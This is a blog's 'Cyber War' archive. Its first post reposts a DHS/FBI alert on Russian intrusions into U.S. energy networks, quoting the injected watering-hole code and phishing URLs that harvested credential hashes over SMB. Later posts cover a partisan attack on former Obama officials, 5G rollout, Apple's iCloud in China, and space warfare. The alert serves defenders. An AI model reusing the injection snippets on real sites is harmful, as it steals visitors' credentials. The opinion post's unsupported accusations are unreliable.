Category Archives: Cyber War

CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

Posted on by

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

US sanctions on Russia coming soon | Free Malaysia Today

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

How Russian hackers got into Yahoo accounts - Business Insider photo

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

 

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

 

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

 

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” />

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;

i.height=2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

 

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

 

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

 

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.

 

Pritzker, Boxer, Sherman and MoveOn.org, the Strike Force

Posted on by

The top person on John Kerry’s Iran JPOA team was Wendy Sherman. But then we have Obama’s dear friend Penny Pritzker in the mix too, along with Barbara Boxer and Hillary’s Jake Sherman all part of this National Security Action team, which is all things against Trump. So, while we do have the Director of MoveOn in the mix…this group likely has some robust funding from Soros.

This is a strike force that even includes Jeremy Bash.

He served as Chief of Staff of the CIA (2009-2011) and Defense Department (2011-2013), was Panetta’s right hand person and perhaps we should remember it was Panetta that allowed Hollywood access to top secret information to make a movie, that Zero Dark Thirty movie.

According to a June 15, 2011, email from Benjamin Rhodes, Deputy National Security Advisor for Strategic Communications, the Obama White House was intent on “trying to have visibility into the UBL (Usama bin Laden) projects and this is likely a high profile one.”

Image result for Ben rhodes jake sherman photo

Ben Rhodes the aspiring novelist became Obama’s top advisor even when Rhodes security clearance was denied.

In early July 2012, Obama’s senior White House adviser on Iran, Puneet Talwar, and Secretary of State Hillary Clinton’s right-hand man, Jake Sullivan, arrived in the sleepy Arabian sultanate of Oman, 150 miles across sparkling Gulf waters from the Iranian coast. It was the first significant back-channel contact with Tehran.

FNC: A group of about 50 former Obama administration officials recently formed a think tank called National Security Action to attack the Trump administration’s national security policies.

The mission statement of the group is anything but subtle: “National Security Action is dedicated to advancing American global leadership and opposing the reckless policies of the Trump administration that endanger our national security and undermine U.S. strength in the world.”

National Security Action plans to pursue typical liberal foreign policy themes such as climate change, challenging President Trump’s leadership, immigration and allegations of corruption between the president and foreign powers.

This organization uses the acronym NSA, which is ironic. Three of its founding members – Ben Rhodes, Susan Rice and Samantha Power – likely were involved in abusing intelligence from the federal NSA (National Security Agency) to unmask the names of Trump campaign staff from intelligence reports and to leak NSA intercepts to the media to hurt Donald Trump politically. This included a leak to the media of an NSA transcript in February 2017 of former National Security Adviser Michael Flynn’s discussion with Russian Ambassador to the U.S. Sergei Kislyak. No one has been prosecuted for this leak.

Given the likely involvement of Rhodes, Rice and Power to weaponize intelligence against the Trump presidential campaign, will their anti-Trump NSA issue an apology for these abuses?

It is interesting that the new anti-Trump group says nothing in its mandate about protecting the privacy of Americans from illegal surveillance, preventing the politicization of U.S. intelligence agencies or promoting aggressive intelligence oversight. Maybe this is because the founders plan to abuse U.S. intelligence agencies to spy on Republican lawmakers and candidates if they join a future Democratic administration.

It takes a lot of chutzpah for this group of former Obama officials, who were part of the worst U.S. foreign policy in history, to condemn the current president’s successful international leadership and foreign policy.

After all, ISIS was born on President Obama’s watch because of his mismanagement of the U.S. withdrawal from Iraq and his “leading from behind” Middle East policy. The Syrian civil war spun out of control because of the incompetence of President Obama and his national security team.

This was a team that provided false information to the American people about the 2012 terrorist attack on the U.S. consulate in Benghazi and the nuclear deal with Iran. I wonder if the anti-Trump NSA will include videos on its website of former National Security Adviser Susan Rice falsely claiming on five Sunday morning news shows in September 2012 that the attack on the Benghazi consulate was “spontaneous” and in response to an anti-Muslim video.

And of course there’s the North Korean nuclear and missile programs that surged during the Obama years due to the administration’s “Strategic Patience” policy, an approach designed to kick this problem down the road to the next president. Because of President Obama’s incompetence, North Korean dictator Kim Jong Un may have an H-bomb that he soon will be able to load onto an intercontinental ballistic missile to attack the United States.

It must appall this group of former Obama national security officials that President Trump is succeeding as he undoes everything they worked on.

ISIS will soon control no territory in Iraq or Syria because of the Trump administration’s intensified attacks on it and arming of Kurdish militias.

In sharp contrast to President Obama, President Trump drew a chemical weapons red line in Syria and enforced it.

North Korea is pushing for talks with the U.S. in response to strong United Nations sanctions the U.S. worked to obtain in 2017. And compliance with the new sanctions has been significantly improved, especially by China, as the result of President Trump’s actions.

President Trump repaired the damage done to U.S.-Israel relations by President Obama and has recognized Jerusalem as the capital of Israel – something several previous presidents promised but failed to do.

Iranian harassment of U.S. ships in the Persian Gulf stopped in 2017, likely due to the more assertive Iran policy of President Trump. This includes the president’s successful effort to build a stronger U.S. relationship with Saudi Arabia.

President Trump is right when he says he inherited a mess on national security from the Obama administration. This is because President Obama and his national security team undermined U.S. credibility and left President Trump a much more dangerous world. I doubt the new anti-Trump National Security Action think tank will succeed in convincing Americans otherwise.

The war on 5G Nationally and Internationally

Posted on by

The first, 1G, was invented by Motorola in 1973. The 1G networks provided basic phone service with analog protocols and speeds of 2.4 kilobits per second. Compare that to today’s 4G network speed of 100 megabits per second and 5G’s proposed 100 gigabits per second. Also in 1973, IEEE Member Robert M. Metcalf invented Ethernet, one of the key enablers of wireless and local Internet access. Ethernet is part of the IEEE 802 suite of standards that underpins wireless networking applications and includes access to the Internet. The 802.11 standard is better known by its trademark name: Wi-Fi. More here.

***

When fourth generation (4G) services launched early this decade, the U.S. led the way. The Federal Communications Commission (FCC) unlocked valuable spectrum, and carriers responded by accommodating a radical, 20-fold growth in global mobile data traffic. The massive investment in wireless network infrastructure rewarded American consumers with faster wireless speeds at affordable prices. In addition to speeding up smartphones in our pockets, the U.S. economy saw an estimated increase in GDP between $73–$151 billion and up to 700,000 new jobs as a result and America was established as the test bed for innovation in the global digital economy.

Now our country faces a similar opportunity and challenge with fifth generation (5G) mobile networks, and it warrants the attention of consumers, the mobile industry, and policymakers. The economic stakes for 5G may be significantly higher than for 4G, led by large-scale job creation and incubation of new devices, applications, and business models that could dramatically stimulate the U.S. economy. More here.

***

As of 2017, development of 5G is being led by several companies, including Samsung, Intel, Qualcomm, Nokia, Huawei, Ericsson, ZTE and others. Huawei and ZTE are part of the Chinese government and all our intelligence agencies have declared they are NOT safe to use in the government realm or the private sector. Canadian media is warning the same due to cyber vulnerabilities. This is all about the expanding digital economy where various cyber currencies will prevail over tangible currency and those respective values cannot be controlled or managed.

***  Image result for 5g photo

President Donald Trump signed an executive order in January calling on federal agencies “to use all viable tools” to build broadband in rural areas on federal lands.

“Those towers are going to go up, and you’re going to have great, great broadband,” Trump said.

But telecom companies don’t have plans to expand 5G to rural areas. Where are they going? To urban and suburban neighborhoods where the business-friendly FCC is considering rules that would limit local governments from having as much of a say over where they go, how they look and how much they can charge for use of public property. Published in partnership with the New York Times 

Small cells, the next generation of wireless technology that telecommunications firms and cell-tower builders want to place on streetlights and utility poles throughout neighborhoods nationwide. The small cells come with a host of equipment, including antennas, power supplies, electric meters, switches, cabling and boxes often strapped to the sides of poles. Some may have refrigerator-sized containers on the ground. And they will be placed about every 500 or so feet along residential streets and throughout business districts.

Telecom companies say the cells will be both unobtrusive and safe, and insist the technology is needed to bring faster internet speeds required by a more connected world.

Telecommunications companies say the current 4G network is becoming overloaded as more people stream more videos and use more data-heavy apps. The advent of driverless cars, smart homes, telemedicine and virtual-reality will create more demand on wireless networks, requiring more bandwidth and faster speeds.

What’s needed, the wireless industry says, is 5G. The next generation network, still in development, is a combination of advanced hardware and standards such as distributed antenna systems, more fiber-optic cable, new data management practices and higher frequencies that will enable the network to carry more data up to 100 times faster than 4G.

5G will depend on so-called millimeter waves. These high-frequency bands, however, don’t travel as far as the signals 4G relies on and are easily blocked by walls, trees and even rain. So the network needs to be dense, with cells placed much closer together. That means way more wireless facilities. More than 300,000 cells are now in operation nationwide, and estimates for the number of small cells needed to make 5G work range from hundreds of thousands to millions more.

The rollout of 5G will be evolutionary, with the standards for the full complement of advanced technologies expected after 2020. Small cells already are being erected with 5G tests in many cities, and as that’s happened, citizens have descended on government meetings to express their anger — from  Woodbury, New York; to Liberty Township, Ohio; to Charlotte; to Pasco County, Florida; to Olympia, Washington.

5G promises to generate huge profits for the wireless companies, with as much as $250 billion in service revenue expected annually by 2025. And 5G will unleash an economic boom, say supporters of pre-empting local rules. They frequently cite a report by the consulting firm Accenture, which concluded that wireless firms will invest $275 billion over the next seven years deploying small cells, creating 3 million jobs and eventually boosting the national economy by $500 billion annually.

The study appears everywhere — mentioned by FCC commissioners in speeches, cited in an official FCC docket, in wireless carriers’ comments, and in statements by the powerful Washington associations that represent them. What most don’t mention is that the study was paid for by the wireless association CTIA, one of Washington’s top lobbying spenders.

The wireless industry argues that localities’ high fees, design requirements and delays in processing permits have effectively prohibited the deployment of broadband, which they argue is a violation of federal law; they’ve asked the FCC to make that clear in reining in cities and counties.

Wireless carriers and the companies that build towers for them have begun flooding city and county permitting offices with applications for attaching small cells to poles and building new ones. Cities that normally see a few dozen such applications yearly began in 2016 to get hundreds, such as Houston.  Montgomery County said it had at one point more applications filed in four months than in the previous 18 years.

Wireless companies complain local governments can’t process the permits fast enough because their systems are set up to review applications for massive cell towers, not the small cells they claim are less intrusive. The process needs to move quickly, they say, because 5G requires so many more cells, and they want to beat other countries to set standards.

The FCC issued a notice in April that it would consider rules to streamline cell deployment by reducing the time cities’ and counties’ have to review applications. The agency also said it would study, with the possibility of proposing rules later, both how the FCC could limit cities’ requirements on the look and design of small cells, and if local fees to attach to poles are excessive. The FCC also asked for ways it could amend its own rules. The agency may consider the proposals by the summer.

Pai, a former attorney for Verizon, also created last year a committee of representatives mostly from the wireless industry to develop model codes that cities and counties can adopt to speed the permitting of small cells and to reduce costs to telecoms. The committee is considering proposals, which it plans to formally submit to the FCC later this spring, that run the gamut, from simply calling on cities and the wireless industry to work together to controversial recommendations such as capping what cities charge to attach to public property.

Mayor Sam Liccardo of San Jose, California, one of the few members on the committee representing local interests and who has been critical of wireless companies’ efforts to weaken local rules, resigned from the group in January, saying the wireless industry “has sought to create a set of rules that will provide it with easy access to publicly-funded infrastructure at taxpayer-subsidized rates, without any obligation to provide broadband access to underserved residents.”

In response, Pai said in a statement that the committee has “brought together 101 participants from a range of perspectives” and he looks forward to working with the committee and others “to remove regulatory barriers to broadband deployment and to extend digital opportunity to all Americans.”

Bipartisan agreement

Congress is also weighing in — in rare bipartisan fashion — on the side of the telecom firms. Numerous bills in both the Senate and House would ease regulations and fees for erecting cells on federal lands, such as a bill the Senate passed last summer that would exempt certain small-cell deployments from environmental and historic reviews. The bill, which the House has yet to consider, is sponsored by South Dakota Sen. John Thune, the Republican chairman of the Commerce, Science and Transportation committee, and Sen. Bill Nelson, D-Fla., the ranking member of the committee.

Also last year, Thune joined Democratic Sen. Brian Schatz from Hawaii to circulate a draft bill that rolls back local government control over wireless facilities including small cells, including shortening the permit review times to 60 days on applications to collocate wireless facilities and 90 days for other wireless applications — the same time frames wireless providers are asking the FCC to consider.

Sens. Roger Wicker, R-Miss., and Catherine Cortez Masto, D-Nev., introduced a bill that would exempt small cells being deployed in a public right of way from environmental and historical reviews under certain circumstances. A companion bill is in the House. Numerous other bills are moving through the House

Wicker and Thune are among the top 25 senators who have received the most campaign contributions from AT&T and Verizon since 2010, pulling in $32,500 and $30,500, respectively, according to the Center for Responsive Politics. Schatz has received $29,000 from the two carriers, the third most among senators since 2014, when he ran his first campaign.

With such bipartisan support in Congress, and with an FCC that is sympathetic to telecoms, cities view their control over small cells as slipping away. That leaves people like King resigned to what is coming.

“A Russian woman stood up to speak at one of these public meetings, and she said that when she lived in Russia, the government slam dunked her and she had no say,” King said. “Now she lives in the United States of America, where she’s getting slam dunked by the government and she has no say. That gives you a window into what’s going on here.”

 

Apple, China and iCloud Data Safety?

Posted on by

Primer: Pegatron, the factory at the corner of Xiu Yan and Shen Jiang roads is one of the most secretive facilities at the heart of iPhone production and covers an area equal to almost 90 football fields. In the center is a plaza with a firehouse, police station and post office. There are shuttle buses, mega-cafeterias, landscaped lawns and koi ponds. The grey and brown-hued concrete buildings are meant to evoke traditional Chinese architecture. The brand-new Shanghai Disneyland, which opens its doors in June, is a 20-minute drive away.

Inside, the factory still hides a secret, according to China Labor Watch. Base pay remains so low that workers need overtime simply to make ends meet, the advocacy group said. It said 1,261 pay stubs from Pegatron’s Shanghai facility from September and October 2015 show evidence of excessive overtime. Pegatron, an Asustek spinoff, is the world’s biggest contract electronics manufacturer after Foxconn, according to Bloomberg Intelligence. More here.

Image result for pegatron china apple photo

Image result for icloud china apple photo

This Wednesday, Apple will be making some significant changes to how data is stored for users of its iCloud service in China – raising major concerns that the Chinese authorities will now be able to freely monitor Apple’s users in China. This may be quite worrying for he population and may remind you of the iCloud breach on 31 August 2014. Ever since then, people have been very sceptical of storing precious information online and have been purchasing services from businesses like http://www.thefinalstep.co.uk/ to protect their data from any hackers.

Apple has a reputation for being a powerful advocate for privacy and security. The company uses strong encryption by default in its services and grabbed headlines when it appealed a US court order that would allow the FBI to get around the phone’s security. Apple CEO Tim Cook even sent all Apple consumers a personal letter explaining the importance of privacy.

With China, however, a different story has emerged. Apple has been criticised for blocking Chinese users’ access to the Apple News app and for removing VPN apps from the App Store in China. The changes being made to iCloud are the latest indication that China’s repressive legal environment is making it difficult for Apple to uphold its commitments to user privacy and security. What do these changes mean and what options do Apple’s customers have to protect themselves?

  1. What is happening to Apple’s iCloud service in China?

On 28 February, Apple will transfer operation of its iCloud service for Chinese users to a Chinese company, Guizhou-Cloud Big Data Industry Development Co., Ltd (“GCBD”). The concept of iCloud and other Cloud computing services can be quite confusing to some, especially if it is something completely new to you. It is very interesting to look into. As many of us use services like this to store our files and photos, it makes sense to know what this is all about. Why not look into a site like https://www.salesforce.com/what-is-cloud-computing/ to stay informed.

The move will affect any photos, documents, contacts, messages and other user data and content that Chinese users store on Apple’s cloud-based servers. New Chinese legislation enacted in 2017 requires cloud services to be operated by Chinese companies, meaning companies like Apple must either lease server space inside China or establish joint ventures with Chinese partners.

  1. How does storing user data in China put individuals at risk?

Domestic law gives the Chinese government virtually unfettered access to user data stored inside China without adequate protection for users’ rights to privacy, freedom of expression or other basic human rights. Chinese police enjoy sweeping discretion and use broad and ambiguously constructed laws and regulations to silence dissent, restrict or censor information and harass and prosecute human rights defenders and others in the name of “national security” and other purported criminal offences. As a result, Chinese Internet users can face arrest and imprisonment for merely expressing, communicating or accessing information and ideas that the authorities don’t like.

Furthermore, China’s Cyber Security Law requires network operators to provide “technical support and assistance” to law enforcement and state security agents. That means that when the authorities come to GCBD requesting information about an iCloud user for the purposes of a criminal investigation, the company has a legal obligation to provide it and few, if any, viable legal avenues to challenge or refuse the request.

  1. Apple says it has control over encryption keys and that it won’t allow backdoors. Won’t that protect users in China?

It all depends on the circumstances under which the company will allow GCBD – and the Chinese authorities – access to intelligible decrypted data on iCloud users. When users accept the terms of service for iCloud in China, they agree to allow their information and content to be turned over to law enforcement “if legally required to do so”. Significantly, from now on Apple will store the encryption keys for Chinese users in China, not in the US – making it all but inevitable that the company will be forced to hand over decrypted data so long as the request complies with Chinese law.

Given that many provisions of Chinese law offer inadequate protection to privacy, freedom of expression and other rights, simply checking whether government information requests comply with Chinese law doesn’t address whether complying with the request might contribute to human rights violations. Apple hasn’t confirmed whether or how it will assess whether government information requests might violate users’ human rights. We won’t really know how Apple will respond until it’s put to the test, and unfortunately that’s probably just a matter of time.

As for “backdoors”, or technical measures that would allow law enforcement or other government agencies to access unencrypted user data without having to ask for it, Apple’s commitment to prevent their use is admirable. But the commitment is meaningless if law enforcement can get the companies to decrypt user information simply by saying that it is for a criminal investigation.

  1. What should iCloud users inside China do to protect themselves?

The best way to protect your personal information from being accessed by the Chinese government is to avoid storing it on servers inside China. Users with a credit card and billing address outside China can use those to register their accounts and keep storing their iCloud data outside China. Otherwise, the only option available to Chinese users is to delete their iCloud accounts and permanently opt out of the service. (Apple has provided instructions for how to do so here.) Individual users should seriously consider the risks involved and come to their own decision, but Apple should protect Chinese users by switching iCloud off by default and giving users very clear warnings about the risks they may face by opting in to the service.

  1. How can ICT companies act responsibly when operating in China?

Companies have a responsibility to respect all human rights wherever they operate in the world. Users of their products and services need to be given clear and specific information about risks they might face to their privacy and freedom of expression in China, and what action the company is taking in response. Companies should carry out regular and verifiable human rights impact assessments and demonstrate publicly that they have oversight, due diligence and accountability measures in place to ensure respect for human rights. Finally, companies should do everything they can to influence the Chinese government to protect and respect human rights and speak up and challenge government actions when they threaten human rights. If a company finds that it is unable to mitigate the high risk of human rights violations, it may be forced to decide not to operate in China.

Apple’s official website declares: “At Apple, we believe privacy is a fundamental human right.” It remains to be seen whether Apple can put its words into action.

Space Warfare, the New Battlefield

Posted on by

Image result for military space warfare photo

Primer: The Pentagon is considering creating a combatant command for space warfare, the latest step by the Defense Department to respond to Chinese and Russian militarization high above Earth.

The move — one of several under consideration — is mentioned in a new Pentagon report sent to Congress last week. Right now, space forces are dispersed throughout the military and intelligence community.

There are two kinds of combatant commands. Geographic cocoms oversee military operations in six regions of the world. Functional ones — like U.S. Strategic Command and U.S.Transportation Command — oversee operations that span multiple geographical commands. U.S. Cyber Command is considered a subunified command under STRATCOM, but is being elevated to a functional command.

The Pentagon is looking into whether space should have its own combatant command or subunified command (like Cyber Command), the report says. Space forces were grouped under U.S. Space Command, a unified combatant command, until 2002.

Image result for u.s. space command

***

The Pentagon is preparing for war should China, Russia, or other adversaries attack vital American satellites and other space systems, a senior Pentagon official told Congress on Wednesday.

The Pentagon has requested $12.5 billion in funding for the fiscal year 2019 that begins Oct. 1 for building up what he termed a “more resilient defendable space architecture.”

The request is $1.1 billion more than funding for last year on military space.

Rood, and Air Force Gen. John Hyten, commander of the Omaha-based Strategic Command, testified on the command’s budget request of $24 billion.

Neither elaborated on what space warfare capabilities are being developed. The Pentagon also has not said how it would deter and defend satellites from attack.

Space defense so far has involved development of intelligence capabilities to identify and assess if an incident in space is an attack, or the result of a malfunction or disruption due to collision with space debris.

Military space “resilience” also calls for the Pentagon to rapidly replace or restore satellites after attacks or other disruptions.

The Pentagon’s Defense Science Board, in a report last year, warned that the vulnerability of U.S. satellites to electronic attack was “a crisis to be dealt with immediately.”

The Joint Staff intelligence directorate warned earlier this year that China and Russia will have fully developed space attack weapons in place by 2020 that will threaten all U.S. satellites in low earth orbit—100 miles to 1,200 miles in space.

“Space is a warfighting domain just like the air, ground, maritime, and cyberspace domains,” Hyten said.

Currently, a defense and intelligence center called the National Space Defense Center, located at Schriever Air Force Base, Colorado, runs 24-hour operations for rapid detection, warning, and defense from space attacks.

War games involving space war also are held regularly with U.S. military forces and allies, including Asian and European allies.

China has conducted at least seven tests of hypersonic vehicles and Russia as well has conducted several hypersonic missile tests.

The hypersonic vehicles are designed to defeat missile defenses. More here.

***

February 2018: The Pentagon put Advanced Extremely High Frequency satellites in orbit to ensure communication in the event of a nuclear attack. But those spacecraft could also play a role in the rapid militarization of space.

  • Advanced Extremely High Frequency (AEHF) satellites will be able to keep the U.S. military in communication even after a nuclear attack.
  • They’re also more resistant to electronic jamming, which is a growing concern as tensions with China and Russia heat up.
  • In the war of the future, nations may try to physically destroy other nations’ satellites to disrupt communications and navigation.

Your phone is not going to work on the day nuclear war starts. But the U.S. President, National Security Council, and combat commanders count on being able to communicate. This doomsday connection relies on what we call Advanced Extremely High Frequency (AEHF) satellites that sit in geostationary orbit.

“We need systems that work on the worst day in the history of the world,” says Todd Harrison, director of the Aerospace Security Project at the Center for Strategic and International Studies.

There are four AEHF sats in orbit today. The proposed 2019 U.S. Air Force budget shows about $29.8 million in funding to complete two more, which would launch in 2019 and 2020. Air Force staffers say more money has been set aside in 2019 to ready the software and databases for the pair of new sats.

The Air Force talks about the AEHF satellites as part of its new focus on modernizing America’s nuclear abilities. “We must concurrently modernize the entire nuclear triad and the command and control systems that enable its effectiveness,” says Air Force Secretary Heather Wilson. The Trump administration has its eye on nuclear weapons, but these satellites also sit at the nexus of another big defense trend: Space warfare.

The Department of Defense is also investing in new jam-resistant GPS satellites. It is pouring money into future satellite programs, including AEHF, to the tune of $677 million for research and development in 2019. As orbital threats grow, new potential users—especially the U.S. Army—are taking interest in what the doomsday spacecraft can do. Preparing for post-apocalyptic communication may be just the beginning. More here.